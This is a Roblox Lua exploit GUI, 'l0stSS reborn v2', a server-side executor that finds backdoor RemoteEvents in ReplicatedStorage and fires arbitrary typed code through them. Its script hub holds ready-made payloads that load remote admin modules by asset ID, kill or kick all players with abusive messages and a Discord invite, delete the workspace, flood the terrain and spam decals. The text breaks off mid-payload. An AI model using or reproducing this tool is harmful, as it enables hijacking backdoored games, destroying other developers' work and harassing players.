--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 32 | Scripts: 4 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.LocalScript
G2L["2"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.Frame
G2L["3"] = Instance.new("Frame", G2L["1"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 169);
G2L["3"]["Size"] = UDim2.new(0, 417, 0, 296);
G2L["3"]["Position"] = UDim2.new(0.27736, 0, 0.34673, 0);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.LocalScript
G2L["4"] = Instance.new("LocalScript", G2L["3"]);



-- StarterGui.ScreenGui.Frame.Frame2
G2L["5"] = Instance.new("Frame", G2L["3"]);
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["5"]["Size"] = UDim2.new(0, 417, 0, 19);
G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Name"] = [[Frame2]];


-- StarterGui.ScreenGui.Frame.Frame2.TextLabel
G2L["6"] = Instance.new("TextLabel", G2L["5"]);
G2L["6"]["TextWrapped"] = true;
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["TextSize"] = 14;
G2L["6"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["6"]["TextScaled"] = true;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["BackgroundTransparency"] = 1;
G2L["6"]["Size"] = UDim2.new(0, 328, 0, 19);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Text"] = [[l0stSS reborn v2 by l0stk1dd88]];
G2L["6"]["Position"] = UDim2.new(0.21343, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame2.ImageLabel
G2L["7"] = Instance.new("ImageLabel", G2L["5"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["7"]["Image"] = [[rbxassetid://81013369562879]];
G2L["7"]["Size"] = UDim2.new(0, 81, 0, 77);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Position"] = UDim2.new(-0.1199, 0, -1.52632, 0);


-- StarterGui.ScreenGui.Frame.TextBox
G2L["8"] = Instance.new("TextBox", G2L["3"]);
G2L["8"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["TextWrapped"] = true;
G2L["8"]["TextSize"] = 14;
G2L["8"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8"]["PlaceholderText"] = [[Your serverside code/require() goes here very obvious LOL]];
G2L["8"]["Size"] = UDim2.new(0, 396, 0, 199);
G2L["8"]["Position"] = UDim2.new(0.02398, 0, 0.09459, 0);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["9"] = Instance.new("LocalScript", G2L["8"]);



-- StarterGui.ScreenGui.Frame.Execute
G2L["a"] = Instance.new("TextButton", G2L["3"]);
G2L["a"]["TextWrapped"] = true;
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextSize"] = 14;
G2L["a"]["TextScaled"] = true;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 128);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["Size"] = UDim2.new(0, 123, 0, 50);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Text"] = [[Execute code]];
G2L["a"]["Name"] = [[Execute]];
G2L["a"]["Position"] = UDim2.new(0.02398, 0, 0.79392, 0);


-- StarterGui.ScreenGui.Frame.Clear
G2L["b"] = Instance.new("TextButton", G2L["3"]);
G2L["b"]["TextWrapped"] = true;
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["TextSize"] = 14;
G2L["b"]["TextScaled"] = true;
G2L["b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 128);
G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b"]["Size"] = UDim2.new(0, 123, 0, 50);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Text"] = [[Clear Input]];
G2L["b"]["Name"] = [[Clear]];
G2L["b"]["Position"] = UDim2.new(0.35252, 0, 0.79392, 0);


-- StarterGui.ScreenGui.Frame.Inject
G2L["c"] = Instance.new("TextButton", G2L["3"]);
G2L["c"]["TextWrapped"] = true;
G2L["c"]["BorderSizePixel"] = 0;
G2L["c"]["TextSize"] = 14;
G2L["c"]["TextScaled"] = true;
G2L["c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 128);
G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["c"]["Size"] = UDim2.new(0, 123, 0, 50);
G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["c"]["Text"] = [[Inject/scan remotes]];
G2L["c"]["Name"] = [[Inject]];
G2L["c"]["Position"] = UDim2.new(0.67866, 0, 0.79392, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame
G2L["d"] = Instance.new("ScrollingFrame", G2L["3"]);
G2L["d"]["Active"] = true;
G2L["d"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
G2L["d"]["BorderSizePixel"] = 0;
G2L["d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["d"]["Name"] = [[ScriptHubFrame]];
G2L["d"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["d"]["Size"] = UDim2.new(0, 104, 0, 296);
G2L["d"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["Position"] = UDim2.new(1, 0, 0, 0);
G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["ScrollBarThickness"] = 10;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
G2L["e"] = Instance.new("LocalScript", G2L["d"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lgui
G2L["f"] = Instance.new("TextButton", G2L["d"]);
G2L["f"]["TextWrapped"] = true;
G2L["f"]["BorderSizePixel"] = 0;
G2L["f"]["TextSize"] = 14;
G2L["f"]["TextScaled"] = true;
G2L["f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["f"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["Text"] = [[c00lgui]];
G2L["f"]["Name"] = [[c00lgui]];
G2L["f"]["Position"] = UDim2.new(0.05769, 0, 0.02703, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.polaria
G2L["10"] = Instance.new("TextButton", G2L["d"]);
G2L["10"]["TextWrapped"] = true;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 14;
G2L["10"]["TextScaled"] = true;
G2L["10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[Polaria]];
G2L["10"]["Name"] = [[polaria]];
G2L["10"]["Position"] = UDim2.new(0.05769, 0, 0.09459, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hdadmin
G2L["11"] = Instance.new("TextButton", G2L["d"]);
G2L["11"]["TextWrapped"] = true;
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["TextSize"] = 14;
G2L["11"]["TextScaled"] = true;
G2L["11"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[HD Admin]];
G2L["11"]["Name"] = [[hdadmin]];
G2L["11"]["Position"] = UDim2.new(0.05769, 0, 0.23311, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.killall
G2L["12"] = Instance.new("TextButton", G2L["d"]);
G2L["12"]["TextWrapped"] = true;
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 14;
G2L["12"]["TextScaled"] = true;
G2L["12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[Kill All]];
G2L["12"]["Name"] = [[killall]];
G2L["12"]["Position"] = UDim2.new(0.05769, 0, 0.31757, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.UIListLayout
G2L["13"] = Instance.new("UIListLayout", G2L["d"]);
G2L["13"]["Padding"] = UDim.new(0, 5);
G2L["13"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.1xgui
G2L["14"] = Instance.new("TextButton", G2L["d"]);
G2L["14"]["TextWrapped"] = true;
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 14;
G2L["14"]["TextScaled"] = true;
G2L["14"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[1x1x1x1 GUI]];
G2L["14"]["Name"] = [[1xgui]];
G2L["14"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hint
G2L["15"] = Instance.new("TextButton", G2L["d"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextScaled"] = true;
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[Hacked Game HInt]];
G2L["15"]["Name"] = [[hint]];
G2L["15"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.deletehints
G2L["16"] = Instance.new("TextButton", G2L["d"]);
G2L["16"]["TextWrapped"] = true;
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 14;
G2L["16"]["TextScaled"] = true;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[Delete Hints]];
G2L["16"]["Name"] = [[deletehints]];
G2L["16"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.playmusic
G2L["17"] = Instance.new("TextButton", G2L["d"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Play spooky scary skeletons]];
G2L["17"]["Name"] = [[playmusic]];
G2L["17"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.setskybox
G2L["18"] = Instance.new("TextButton", G2L["d"]);
G2L["18"]["TextWrapped"] = true;
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 14;
G2L["18"]["TextScaled"] = true;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[Set Skybox]];
G2L["18"]["Name"] = [[setskybox]];
G2L["18"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fixskybox
G2L["19"] = Instance.new("TextButton", G2L["d"]);
G2L["19"]["TextWrapped"] = true;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["TextSize"] = 14;
G2L["19"]["TextScaled"] = true;
G2L["19"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["19"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Text"] = [[Restore Skybox]];
G2L["19"]["Name"] = [[fixskybox]];
G2L["19"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.decalspam
G2L["1a"] = Instance.new("TextButton", G2L["d"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[Decal Spam]];
G2L["1a"]["Name"] = [[decalspam]];
G2L["1a"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.flood
G2L["1b"] = Instance.new("TextButton", G2L["d"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[Flood]];
G2L["1b"]["Name"] = [[flood]];
G2L["1b"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.kickall
G2L["1c"] = Instance.new("TextButton", G2L["d"]);
G2L["1c"]["TextWrapped"] = true;
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 14;
G2L["1c"]["TextScaled"] = true;
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[Kick All]];
G2L["1c"]["Name"] = [[kickall]];
G2L["1c"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hackmessage
G2L["1d"] = Instance.new("TextButton", G2L["d"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[TextLabel Hack All]];
G2L["1d"]["Name"] = [[hackmessage]];
G2L["1d"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.clearwater
G2L["1e"] = Instance.new("TextButton", G2L["d"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[Clear Terrain]];
G2L["1e"]["Name"] = [[clearwater]];
G2L["1e"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.trollall
G2L["1f"] = Instance.new("TextButton", G2L["d"]);
G2L["1f"]["TextWrapped"] = true;
G2L["1f"]["BorderSizePixel"] = 0;
G2L["1f"]["TextSize"] = 14;
G2L["1f"]["TextScaled"] = true;
G2L["1f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1f"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["1f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["Text"] = [[Troll All]];
G2L["1f"]["Name"] = [[trollall]];
G2L["1f"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.atmosphere
G2L["20"] = Instance.new("TextButton", G2L["d"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextScaled"] = true;
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["Size"] = UDim2.new(0, 92, 0, 31);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[Delete Atmosphere]];
G2L["20"]["Name"] = [[atmosphere]];
G2L["20"]["Position"] = UDim2.new(0.05769, 0, 0.15878, 0);


-- StarterGui.ScreenGui.LocalScript
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	
	-- Safety check
	if not textbox or not executeButton or not clearButton or not injectButton then
		warn("❌ Missing GUI components.")
		return
	end
	
	-- 🚀 Execute payload from textbox
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" then
			local remote =
				replicatedStorage:FindFirstChild("Backdoor") or
				replicatedStorage:FindFirstChild("RemoteEvent") or
				replicatedStorage:FindFirstChild("RE")
	
			if remote and remote:IsA("RemoteEvent") then
				pcall(function()
					remote:FireServer(payload)
				end)
				print("✅ Payload fired through:", remote.Name)
			else
				warn("⚠️ No valid RemoteEvent found.")
			end
		end
	end)
	
	-- 🧼 Clear textbox
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		print("🧹 Textbox cleared.")
	end)
	
	-- 🔍 Inject: Scan for RemoteEvents and test with payload
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'print("Backdoor test from GAMING")'
		local found = false
	
		for _, obj in ipairs(replicatedStorage:GetChildren()) do
			if obj:IsA("RemoteEvent") then
				local success = pcall(function()
					obj:FireServer(testPayload)
				end)
	
				if success then
					found = true
					print("✅ Injected into RemoteEvent:", obj.Name)
					break
				end
			end
		end
	
		if not found then
			print("❌ No active backdoor RemoteEvent found.")
		end
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.Frame.LocalScript
local function C_4()
local script = G2L["4"];
	-- LocalScript inside your Frame
	
	local frame = script.Parent
	local dragging = false
	local dragInput, mousePos, framePos
	
	frame.Active = true
	frame.Selectable = true
	frame.Draggable = false -- we’ll handle it manually
	
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			mousePos = input.Position
			framePos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	frame.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement then
			dragInput = input
		end
	end)
	
	game:GetService("UserInputService").InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			local delta = input.Position - mousePos
			frame.Position = UDim2.new(
				framePos.X.Scale,
				framePos.X.Offset + delta.X,
				framePos.Y.Scale,
				framePos.Y.Offset + delta.Y
			)
		end
	end)
end;
task.spawn(C_4);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_9()
local script = G2L["9"];
	local textbox = script.Parent
	
	textbox.ClearTextOnFocus = false
end;
task.spawn(C_9);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
local function C_e()
local script = G2L["e"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	-- GUI hierarchy
	local scriptHubFrame = script.Parent
	local mainFrame = scriptHubFrame.Parent
	local textbox = mainFrame:FindFirstChild("TextBox")
	
	-- 🎶 Music settings
	local musicId = "95156028272944"
	local playbackSpeed = 0.2
	
	-- 🌌 Skybox settings
	local skyboxId = "111473923563814"
	
	-- 🧱 Decal settings
	local decalId = "81013369562879"
	
	-- Exploit payloads
	local buttons = {
		c00lgui = 'require(14125553864):Fire("' .. username .. '","c00lkidd")',
		polaria = 'require(123255432303221):Pload("' .. username .. '")',
		hdadmin = 'require(7192763922).load("' .. username .. '")',
		["1xgui"] = 'require(6858594080).KrnKidsSus("' .. username .. '")',
		killall = [[
	for _, p in pairs(game.Players:GetPlayers()) do
		if p.Character and p.Character:FindFirstChild("Humanoid") then
			p.Character.Humanoid.Health = 0
		end
	end
	]],
		clearworkspace = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if not obj:IsA("Terrain") and obj.Name ~= "Camera" then
			obj:Destroy()
		end
	end
	]],
		hint = [[
	local hint = Instance.new("Hint", workspace)
	hint.Text = "This server has been hacked by TLK88 (team l0stk1dd88) you fucking noobs! prepare for chaos! join us in our disc invite: https://discord.gg/93xs9dAECK"
	]],
		deletehints = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if obj:IsA("Hint") then
			obj:Destroy()
		end
	end
	]],
		playmusic = [[
	local sound = Instance.new("Sound", workspace)
	sound.SoundId = "rbxassetid://]] .. musicId .. [["
	sound.PlaybackSpeed = ]] .. playbackSpeed .. [[
	sound.Volume = 1
	sound.Looped = true
	sound:Play()
	]],
		setskybox = [[
	local sky = Instance.new("Sky", game.Lighting)
	sky.SkyboxBk = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxDn = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxFt = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxLf = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxRt = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxUp = "rbxassetid://]] .. skyboxId .. [["
	]],
		fixskybox = [[
	for _, obj in pairs(game.Lighting:GetChildren()) do
		if obj:IsA("Sky") then
			obj:Destroy()
		end
	end
	]],
		decalspam = [[
	local decalId = "rbxassetid://]] .. decalId .. [["
	
	for _, part in pairs(workspace:GetDescendants()) do
		if part:IsA("BasePart") then
			for _, face in pairs(Enum.NormalId:GetEnumItems()) do
				local decal = Instance.new("Decal")
				decal.Face = face
				decal.Texture = decalId
				decal.Parent = part
			end
		end
	end
	]],
		flood = [[
	local terrain = workspace.Terrain
	local regionSize = Vector3.new(2048, 1000, 2048)
	local regionCenter = Vector3.new(0, 0, 0)
	terrain:FillBlock(CFrame.new(regionCenter), regionSize, Enum.Material.Water)
	]],
		kickall = [[
	for _, p in pairs(game.Players:GetPlayers()) do
		p:Kick("you have been kicked by TLK88(team l0stk1dd88) you stupid fucking noob! join us today! disc invite: https://discord.gg/93xs9dAECK")
	end
	]],
		hackmessage = [[
	for _, player in pairs(game.Players:GetPlayers()) do
		local gui = Instance.new("ScreenGui")
		gui.Name = "TLK88Overlay"
		gui.ResetOnSpawn = false
		gui.Parent = player:WaitForChild("PlayerGui")
	
		local label = Instance.new("TextLabel")
		label.Size = UDim2.new(0, 400, 0, 50)
